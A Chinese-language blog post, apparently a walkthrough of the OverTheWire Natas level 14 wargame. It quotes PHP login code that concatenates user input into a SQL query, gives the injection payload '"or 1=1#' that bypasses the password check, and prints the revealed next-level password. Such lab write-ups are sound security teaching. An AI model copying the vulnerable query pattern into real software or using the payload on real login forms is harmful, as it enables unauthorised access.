Overthewire-natas14

Overthewire level 14 to level 15

这一关需要我们输入用户名和密码来获取15关的密码,网页源代码如下

if(array_key_exists("username", $_REQUEST)) {
    $link = mysql_connect('localhost', 'natas14', '<censored>');
    mysql_select_db('natas14', $link);

    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query<br>";
    }

    if(mysql_num_rows(mysql_query($query, $link)) > 0) {
            echo "Successful login! The password for natas15 is <censored><br>";
    } else {
            echo "Access denied!<br>";
    }
    mysql_close($link);
}

由于代码中直接将username和password进行拼接,我们可以考虑sql注入的方式绕过登录机制

username = "or 1=1#
password =

一个很简单的sql注入,拼接后的query为

select * from users where username="" or 1=1#

"#" 注释了之后的代码,因此密码就无关紧要了
Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

posted @ 2021-05-26 08:55  wudiiv11  阅读(57)  评论(0编辑  收藏  举报